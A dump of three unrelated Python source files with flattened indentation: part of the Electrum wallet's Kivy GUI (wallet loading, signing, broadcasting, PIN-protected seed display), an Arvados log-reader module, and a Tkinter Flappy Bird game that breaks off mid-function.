activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage):
if storage:
wallet = Wallet(storage)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
storage = WalletStorage(path, manual_upgrades=True)
if not storage.file_exists():
wizard.run('new')
elif storage.is_encrypted():
raise Exception("Kivy GUI does not support encrypted wallet files.")
elif storage.requires_upgrade():
wizard.upgrade_storage(storage)
else:
raise Exception("unexpected storage file situation")
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
reader.py
|
# Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: AGPL-3.0
import arvados
import itertools
import queue
import threading
from crunchstat_summary import logger
class CollectionReader(object):
def __init__(self, collection_id):
self._collection_id = collection_id
self._label = collection_id
self._readers = []
def __str__(self):
return self._label
def __iter__(self):
logger.debug('load collection %s', self._collection_id)
collection = arvados.collection.CollectionReader(self._collection_id)
filenames = [filename for filename in collection]
# Crunch2 has multiple stats files
if len(filenames) > 1:
filenames = ['crunchstat.txt', 'arv-mount.txt']
for filename in filenames:
try:
self._readers.append(collection.open(filename))
except IOError:
logger.warn('Unable to open %s', filename)
self._label = "{}/{}".format(self._collection_id, filenames[0])
return itertools.chain(*[iter(reader) for reader in self._readers])
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self._readers:
for reader in self._readers:
reader.close()
self._readers = []
class LiveLogReader(object):
EOF = None
def __init__(self, job_uuid):
self.job_uuid = job_uuid
self.event_types = (['stderr'] if '-8i9sb-' in job_uuid else ['crunchstat', 'arv-mount'])
logger.debug('load %s events for job %s', self.event_types, self.job_uuid)
def __str__(self):
return self.job_uuid
def _get_all_pages(self):
got = 0
last_id = 0
filters = [
['object_uuid', '=', self.job_uuid],
['event_type', 'in', self.event_types]]
try:
while True:
page = arvados.api().logs().index(
limit=1000,
order=['id asc'],
filters=filters + [['id','>',str(last_id)]],
select=['id', 'properties'],
).execute(num_retries=2)
got += len(page['items'])
logger.debug(
'%s: received %d of %d log events',
self.job_uuid, got,
got + page['items_available'] - len(page['items']))
for i in page['items']:
for line in i['properties']['text'].split('\n'):
self._queue.put(line+'\n')
last_id = i['id']
if (len(page['items']) == 0 or
len(page['items']) >= page['items_available']):
break
finally:
self._queue.put(self.EOF)
def __iter__(self):
self._queue = queue.Queue()
self._thread = threading.Thread(target=self._get_all_pages)
self._thread.daemon = True
self._thread.start()
return self
def __next__(self):
line = self._queue.get()
if line is self.EOF:
self._thread.join()
raise StopIteration
return line
next = __next__ # for Python 2
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
|
FlappyBird - Windows [3.0.5].py
|
'''
FlappyBird Version 2.9.3 on Windows
'''
#Program for python 3.5
try:
from tkinter import * #needed tkinter module
from tkinter import messagebox, filedialog
import tkinter.ttk as t
except ImportError:
raise ImportError("You need to install tkinter module for python3.5")
from random import randint
import time, sys, os, threading
try:
from playsound import *
except ImportError:
raise ImportError("You need to install playsound module for python3.5")
try: #####IMPORT MODULES AND NOT CRASH PROGRAM WITH TRY-EXCEPT######
import GamingIntro
except ImportError:
raise ImportError("Missing file module for this program: \'GamingIntro.py\'") #My module-file
try:
import HighscoreManager
except ImportError:
raise ImportError("Missing file module for this program: \'HighscoreManager.py\'") #My module-file
try:
import FeedbackInterface
except ImportError:
raise ImportError("Missing file module for this program: \'FeedbackInterface.py\'") #My module-file
try:
import Preferences
except ImportError:
raise ImportError("Missing file module for this program: \'Preferences.py\'") #My module-file
try:
from ErrorCase import ErrorManager
except ImportError:
raise ImportError("Missing file module for this program: \'ErrorCase.py\'") #My module-file
global home
#print(__file__.split("\ "[0])[2])
user = os.path.abspath("").split("\ "[0])[2]#input("Whats your current username directory on this computer?: ") #__file__.split("\ "[0])[2]#
home = "C:/Users/{0}".format(user) + "/"
#Sound
#directory, openfile, openfilename, openfilenames, openfiles, saveasfile, saveasfilename, commanddialog
highscore = 0
if os.path.isdir(home+".FlappyBird") == False: #Create data directory
os.mkdir(home+".FlappyBird")
first_time = True
else:
first_time = False
if os.path.exists(home+".FlappyBird/highscore.txt") == False:
f = open(home+".FlappyBird/highscore.txt", "w")
f.write(str(highscore))
f.close()
else:
f = open(home+".FlappyBird/highscore.txt", "r")
dt = f.read()
highscore = int(dt)
f.close()
class CollisionZone(): #Collision zone class for development mode
def __init__(self, game, x, y, x1, y1, color="blue"):
self.game = game
self.color = color
self.id = self.game.canvas.create_rectangle(x, y, x1, y1, outline=self.color)
def update(self, x, y, x1, y1):
self.game.canvas.delete(self.id)
self.id = self.game.canvas.create_rectangle(x, y, x1, y1, outline=self.color)
def __del__(self):
self.game.canvas.delete(self.id)
class Game():
def __init__(self, dev=False, directory=""):
self.dev = dev #development mode
self.dir = directory #path location
p = Preferences.Preference(pathinit=home, pt=self.dir)
if p.getData() == {}:
self.preferences_data = {'Kick-Key':'<space>', 'GamingIntro-Init':'0', \
'Bindings':'p;F3;s', 'DevMode':'False', 'Scales':'180;14', "Color":"#00ff00"}
else:
self.preferences_data = p.getData()
self.current_pref = [self.preferences_data['Kick-Key']] + \
self.preferences_data['Bindings'].split(";")
self.bars_space = int(self.preferences_data['Scales'].split(";")[0]) #space between bars (px)
self.current_pref = [self.preferences_data['Kick-Key']] + self.preferences_data['Bindings'].split(";")
self.tk = Tk()
self.tk.bind("<Key>", self.keys)
#self.tk.bind("<Destroy>", self.destroy)
menu = Menu(self.tk) #Menu for user
self.tk.config(menu=menu)
def callback():
self.gameover()
def hsc():
#init highscore from my HighscoreManager module
h = HighscoreManager.Highscore(users=os.listdir("C:/Users"), pathinit=home)
hs = h.getTable()
shs = h.getSortedTable(hs) #get sorted highscores
highscore = "Highscores: \n"
for k, v in shs.items():
highscore += str(k)+" "+str(v)+"; "
messagebox.showinfo("OMGames", highscore)
def w_fe():
f = FeedbackInterface.Feedback(pathinit=home, users=os.listdir("C:/Users"))
f.start()
def s_fe():
f = FeedbackInterface.Feedback(pathinit=home, users=os.listdir("C:/Users"))
f.see_feedbacks()
def pref():
#messagebox.showinfo("Missing Option", "This option needs to be continued")
p = Preferences.Preference(pathinit=home)
p.initialization()
#print(p.getData())
self.preferences_data = p.getData()
#print("preferences_data:", self.preferences_data)
#print("\nQUIIIIIIIIIII\n")
self.load_data_pref()
p.mainloop()
def reset():
for file in os.listdir(home+".FlappyBird"):
os.remove(home+".FlappyBird/"+file)
os.rmdir(home+".FlappyBird")
messagebox.showinfo("Info", "Game has been reset")
self.tk.destroy()
sys.exit()
#pref()
filemenu = Menu(menu, tearoff=0)
feedmenu = Menu(menu, tearoff=0)
prefmenu = Menu(menu, tearoff=0)
menu.add_cascade(label="Game", menu=filemenu)
menu.add_cascade(label="Feedback", menu=feedmenu)
menu.add_cascade(label="Preferences", menu=prefmenu)
feedmenu.add_command(label="Write feedback", command=w_fe)
feedmenu.add_command(label="See feedbacks", command=s_fe)
filemenu.add_command(label="See highscores", command=hsc)
filemenu.add_separator()
filemenu.add_command(label="Quit", command = callback)
prefmenu.add_command(label="Change Settings", command=pref)
prefmenu.add_command(label="Reset game", command=reset)
imgicon = PhotoImage(file=os.path.join(self.dir,self.dir+'FlappyBird_Game/icon.gif'), master=self.tk) #Set icon of game
self.tk.tk.call('wm', 'iconphoto', self.tk._w, imgicon)
self.tk.title("Flappy Bird (OMGames) V3.0.1") #Game title
self.canvas = Canvas(self.tk, width=600, height=500)
self.canvas.pack()
self.score = 0 #Default game values (score, highscore, attemps and if the game is Running)
self.attemps = 1
self.highscore = 0
self.sound = True
self.sound2 = True
self.gameIsRunning = False
self.score_text = self.canvas.create_text(290,20, fill="red", \
font="Purisa 20 bold", \
text="Score: %s Attemps: %s " \
"Highscore: %s" % (self.score, self.attemps, \
self.highscore))
self.canvas2 = Canvas(self.tk, width=600, height=100) #A second canvas for the bottom image
self.canvas2.pack()
self.pause = False #if game is paused
def destroy(self, evt=None):
try:
self.save_highscore()
self.tk.destroy()
except:
pass
def load_data_pref(self):
self.tk.unbind(self.current_pref[0])
self.tk.bind("<Key-l>")#self.preferences_data['Kick-Key'], ball.kick)
self.current_pref = [self.preferences_data['Kick-Key']] + self.preferences_data['Bindings'].split(";")
#print("\n", self.current_pref, self.preferences_data, "\n")
self.bars_space = int(self.preferences_data['Scales'].split(";")[0]) #space between bars (px)
def keys(self, evt):
if evt.keysym == self.current_pref[2] or evt.char == self.current_pref[2]: #For activating development mode
self.dev = (not self.dev)
if self.dev:
print("Development mode activated")
else:
print("Development mode deactivated")
if evt.char == self.current_pref[1] or evt.keysym == self.current_pref[1]: #for pause game
self.pause = not (self.pause)
if self.pause:
self.gameIsRunning = False
print("Game paused")
messagebox.showinfo("OMGames", "Game paused, press p to resume")
elif self.pause == False:
print("Game resumed")
messagebox.showinfo("OMGames", "Game resumed, after clicking the ok button the game will start")
self.gameIsRunning = True
self.mainloop()
def play_sound(self, path, bs=False, ks=False): #Playing sound effects using a thread so
def pl(pt): #that the game does not stop by playing the sound
playsound(pt)
if bs:
self.sound = True
'''if ks:
self.sound2 = True'''
if not bs:# or not ks:
x = threading.Thread(target=pl, args=(path,))
x.start()
elif bs:
if self.sound:
x = threading.Thread(target=pl, args=(path,))
self.sound = False
x.start()
'''elif ks:
if self.sound2:
x = threading.Thread(target=pl, args=(path,))
self.sound2 = False
x.start()'''
def mainloop(self): #Game Mainloop
try:
while True:
if self.gameIsRunning:
ball.draw() #Draw the bird
pali[pli[0]].draw() #Draw the sticks
pali[pli[1]].draw()
pali[pli[2]].draw()
pali_r[pri[0]].draw()
pali_r[pri[1]].draw()
pali_r[pri[2]].draw()
self.tk.update()
self.canvas.tag_raise(self.score_text)
time.sleep(0.01)
else:
self.tk.update()
except:
pass
def gameover(self):
self.gameIsRunning = False #Stop the game after gameover
self.tk.update()
self.play_sound(self.dir+"FlappyBird_Game/FlappyBird_Sounds/hit.mp3")
self.play_sound(self.dir+"FlappyBird_Game/FlappyBird_Sounds/die.mp3")
messagebox.showerror("Game over", "GAME OVER - Your Score is: %s Highscore: %s" % (self.score, \
self.highscore))
self.attemps += 1
self.update_score()
a = messagebox.askyesno("Game", "Do you want to continue playing?")
if a:
load = Tk()
load.title("Attemp retry: %s" % self.attemps)
ll = Label(load, text="Attemp retry: %s" % self.attemps)
ll.pack()
pr = t.Progressbar(load, length=150, value=0)
pr.pack()
vl = 0
while vl <= 135:
pr.config(value=vl)
load.update()#_idletasks()
time.sleep(0.7)
vl += randint(0,35)
l = Label(load, text="Done")
l.pack()
time.sleep(2)
self.destroy()
load.destroy()
try:
main(self.attemps, self.highscore, self.dir) #If the user wants to play another
#time, it starts another time the main
except Exception as e:
error = ErrorManager(e)
error.showgui()
error.mainloop()
else:
messagebox.showinfo("Game", "See you Player - Attemps: %s" % self.attemps)
self.save_highscore()
def save_highscore(self):
f2 = open(home+".FlappyBird/highscore.txt", "w") #Save the current highscore
f2.write(str(self.highscore))
f2.close()
try:
self.tk.destroy()
except:
pass
def update_score(self):
self.canvas.itemconfig(self.score_text, text="Score: %s Attemps: %s " \
"Highscore: %s" % (self.score, self.attemps, self.highscore))
self.tk.update()
def GetImageCoords(self, id, cc): #Get coordinates of something
xy = self.canvas.coords(id) #2 items list of coords [x1, y1] because the function is for images
xy.append(xy[0]+cc[0]) #add width to x coord
xy.append(xy[1]+cc[1]) #add height to y coord
return xy #get 4 items list
def collision(self, ball_pos, pos_palo): #Fetch collision between two objects
if ((ball_pos[0] >= pos_palo[0] and ball_pos[0] <= pos_palo[2]) and \
(ball_pos[1] >= pos_palo[1] and ball_pos[1] <= pos_palo[3])) or \
((ball_pos[2] >= pos_palo[0] and ball_pos[2] <= pos_palo[2]) and \
(ball_pos[3] >= pos_palo[1] and ball_pos[3] <= pos_palo[3])):
return True
return False
class Ball():
def __init__(self, game, x, y, image):
self.game = game
self.ih, self.iw = (image.height(), image.width()) #save img width and height
self.xc, self.yc = (x, y)
self.id = self.game.canvas.create_image(x,y, image=image, anchor="nw")
self.y = 0.5
self.game.tk.bind(g.preferences_data['Kick-Key'], self.kick)
self.x = 0
self.s = True
def draw(self):
if self.game.dev and self.s: #if development mode is activated and is the first time after deactivated
self.collisionzone = CollisionZone(self.game, self.xc, self.yc, self.xc+self.iw, \
self.yc+self.ih, color="red") #create collision zone
self.s = False #it isn't more the first time
self.game.canvas.move(self.id, self.x, int(self.y)) #vedi int
self.y += 0.3 #the bird must go down
self.game.play_sound(self.game.dir+"FlappyBird_Game/FlappyBird_Sounds/swoosh.mp3", bs=True)
pos = self.game.GetImageCoords(self.id, [self.iw, self.ih])
if self.game.dev:
self.collisionzone.update(pos[0], pos[1], pos[2], pos[3]) #update collision zone
elif not self.s:
del self.collisionzone #delete collision zone
self.s = True
if pos[3] >= 500 or pos[1] <= 0: #if touching the borders
self.game.gameover()
def kick(self, evt):
if self.game.gameIsRunning:
#self.game.play_sound(self.game.dir+"FlappyBird_Game/FlappyBird_Sounds/wing.mp3", bs=True)
self.y -= int(self.game.preferences_data['Scales'].split(";")[1]) #kick the bird 17 pixel upper
class Palo():
def __init__(self, game, x, y, ball, image, image1):
self.game = game
self.ball = ball
self.image = image #top image
self.image1 = image1 #bottom image
self.xc, self.yc = (x, y)
self.id = self.game.canvas.create_image(x,y, image=image1, anchor="nw")
self.x = -1
self.y = 0
self.ih, self.iw = (image.height(), image.width())
self.coord = [x, y, x+self.iw, y+self.ih]
self.side = "bottom" #side of the stick
if self.game.dev:
self.collisionzone = CollisionZone(self.game, self.coord[0], self.coord[1], \
self.coord[2], self.coord[3])
self.s = True
def draw(self):
if self.game.dev and self.s:
self.collisionzone = CollisionZone(self.game, self.xc, self.yc, self.xc+self.iw, \
self.yc+self.ih)
self.s = False
self.game.canvas.move(self.id, int(self.x), self.y)
pos_palo = self.game.GetImageCoords(self.id, [self.iw, self.ih])
self.coord = pos_palo
if self.game.dev:
self.collisionzone.update(self.coord[0], self.coord[1], self.coord[2], self.coord[3])
elif not self.s:
del self.collisionzone
self.s = True
ball_pos = self.game.GetImageCoords(self.ball.id, [self.ball.iw, self.ball.ih])
if self.game.collision(ball_pos, pos_palo): #if touching the ball:
